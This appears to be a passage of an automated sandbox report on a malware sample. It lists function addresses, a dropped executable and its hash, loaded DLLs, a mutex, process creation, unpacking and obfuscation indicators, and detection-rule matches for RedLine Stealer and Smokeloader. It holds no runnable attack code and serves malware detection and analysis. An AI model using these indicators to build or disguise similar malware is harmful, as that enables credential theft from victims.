      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0040CD464_2_0040CD46
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004375004_2_00437500
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004225104_2_00422510
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00417DEE4_2_00417DEE
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00437DF04_2_00437DF0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004095804_2_00409580
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0041759F4_2_0041759F
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00425E704_2_00425E70
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00436E744_2_00436E74
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004276034_2_00427603
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00425E304_2_00425E30
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004286C04_2_004286C0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043AEC04_2_0043AEC0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004266D04_2_004266D0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004236E24_2_004236E2
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00405EE04_2_00405EE0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0041DE804_2_0041DE80
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00402F504_2_00402F50
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00420F504_2_00420F50
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00438F594_2_00438F59
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004067104_2_00406710
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00423F204_2_00423F20
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043F7204_2_0043F720
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00419F304_2_00419F30
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0041E7C04_2_0041E7C0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004197C24_2_004197C2
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0042DFE94_2_0042DFE9
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0040A7804_2_0040A780
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00411F904_2_00411F90
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004187924_2_00418792
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004157994_2_00415799
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043EFB04_2_0043EFB0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009160D74_2_009160D7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009270DB4_2_009270DB
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0090E0E74_2_0090E0E7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009080554_2_00908055
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009280574_2_00928057
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0090A1974_2_0090A197
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009111B74_2_009111B7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009021F74_2_009021F7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0092B1274_2_0092B127
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008F61474_2_008F6147
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009131664_2_00913166
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0092F2174_2_0092F217
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0090D2304_2_0090D230
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0091E2504_2_0091E250
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009123F74_2_009123F7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0090E4F74_2_0090E4F7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008F64E74_2_008F64E7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008F94174_2_008F9417
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009194444_2_00919444
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0092F5974_2_0092F597
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008F45874_2_008F4587
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008F85974_2_008F8597
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0092D5B44_2_0092D5B4
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0091351D4_2_0091351D
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0090B5474_2_0090B547
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009156944_2_00915694
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009146874_2_00914687
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009016F64_2_009016F6
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008F97E74_2_008F97E7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008F77574_2_008F7757
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009127774_2_00912777
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009277674_2_00927767
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009078064_2_00907806
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0092F9874_2_0092F987
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008FA9E74_2_008FA9E7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009169374_2_00916937
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_009189274_2_00918927
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008F69774_2_008F6977
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008F8AB74_2_008F8AB7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0090EA274_2_0090EA27
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00909A294_2_00909A29
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00928A774_2_00928A77
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00910BA04_2_00910BA0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00920BA74_2_00920BA7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008F3BD74_2_008F3BD7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008F5BF74_2_008F5BF7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00911B074_2_00911B07
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0091CCB04_2_0091CCB0
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0091DCBC4_2_0091DCBC
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008FEC774_2_008FEC77
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0091CD894_2_0091CD89
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0091CD374_2_0091CD37
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0091CD784_2_0091CD78
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00926D6F4_2_00926D6F
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0090FEDC4_2_0090FEDC
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0091AEF74_2_0091AEF7
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008FDE404_2_008FDE40
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0090CE634_2_0090CE63
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0090DE674_2_0090DE67
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008FCFAD4_2_008FCFAD
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0092EF074_2_0092EF07
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00906F354_2_00906F35
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe 174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\E093.tmp.exe 174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: String function: 00410720 appears 53 times
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: String function: 0040F903 appears 36 times
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: String function: 0040FDB2 appears 125 times
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: String function: 024B0987 appears 53 times
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: String function: 024B0019 appears 121 times
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: String function: 00408030 appears 42 times
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: String function: 00414400 appears 65 times
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: String function: 00904667 appears 65 times
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: String function: 008F8297 appears 72 times
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 1656
      Source: sqJIHyPqhr.exeBinary or memory string: OriginalFileName vs sqJIHyPqhr.exe
      Source: sqJIHyPqhr.exe, 00000000.00000003.2456196021.0000000002570000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs sqJIHyPqhr.exe
      Source: sqJIHyPqhr.exe, 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs sqJIHyPqhr.exe
      Source: sqJIHyPqhr.exe, 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs sqJIHyPqhr.exe
      Source: sqJIHyPqhr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000004.00000002.2679002116.0000000000999000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: sqJIHyPqhr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: E093.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@2/3
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_009DA456 CreateToolhelp32Snapshot,Module32First,0_2_009DA456
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00430C70 CoCreateInstance,4_2_00430C70
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\track_prt[1].htmJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeMutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6636
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeFile created: C:\Users\user\AppData\Local\Temp\E093.tmpJump to behavior
      Source: sqJIHyPqhr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: sqJIHyPqhr.exeReversingLabs: Detection: 73%
      Source: unknownProcess created: C:\Users\user\Desktop\sqJIHyPqhr.exe "C:\Users\user\Desktop\sqJIHyPqhr.exe"
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeProcess created: C:\Users\user\AppData\Local\Temp\E093.tmp.exe "C:\Users\user\AppData\Local\Temp\E093.tmp.exe"
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 1656
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeProcess created: C:\Users\user\AppData\Local\Temp\E093.tmp.exe "C:\Users\user\AppData\Local\Temp\E093.tmp.exe" Jump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeUnpacked PE file: 4.2.E093.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeUnpacked PE file: 0.2.sqJIHyPqhr.exe.400000.0.unpack
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeUnpacked PE file: 4.2.E093.tmp.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_00410766 push ecx; ret 0_2_00410779
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_009DD04D push 00000003h; ret 0_2_009DD051
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_009DB2A2 push es; iretd 0_2_009DB2B3
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_009DCBAC pushad ; ret 0_2_009DCBD4
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024B09CD push ecx; ret 0_2_024B09E0
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024D799F push esp; retf 0_2_024D79A7
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024BCE18 push ss; retf 0_2_024BCE1D
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024AFFF3 push ecx; ret 0_2_024B0006
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024D7F9D push esp; retf 0_2_024D7F9E
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024DDDDE push dword ptr [esp+ecx-75h]; iretd 0_2_024DDDE2
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024D9DE8 pushad ; retf 0_2_024D9DEF
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh4_2_0043D812
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00443469 push ebp; iretd 4_2_0044346C
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0044366E push 9F00CD97h; ret 4_2_004436B1
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h4_2_0043AE3E
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_004477A5 push ebp; iretd 4_2_004477AA
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0092B097 push eax; mov dword ptr [esp], 1D1E1F10h4_2_0092B0A5
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0092DA77 push eax; mov dword ptr [esp], 707F7E0Dh4_2_0092DA79
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_00913A79 push esp; iretd 4_2_00913A7C
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0099F1B5 push ss; retf 4_2_0099F1A3
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0099F132 push ss; retf 4_2_0099F1A3
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0099CD88 push ebp; ret 4_2_0099CD8B
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0099ADE4 push 00000039h; ret 4_2_0099AEBB
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0099AE4D push 00000039h; ret 4_2_0099AEBB
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0099AE73 push 00000039h; ret 4_2_0099AEBB
      Source: sqJIHyPqhr.exeStatic PE information: section name: .text entropy: 7.542034715807606
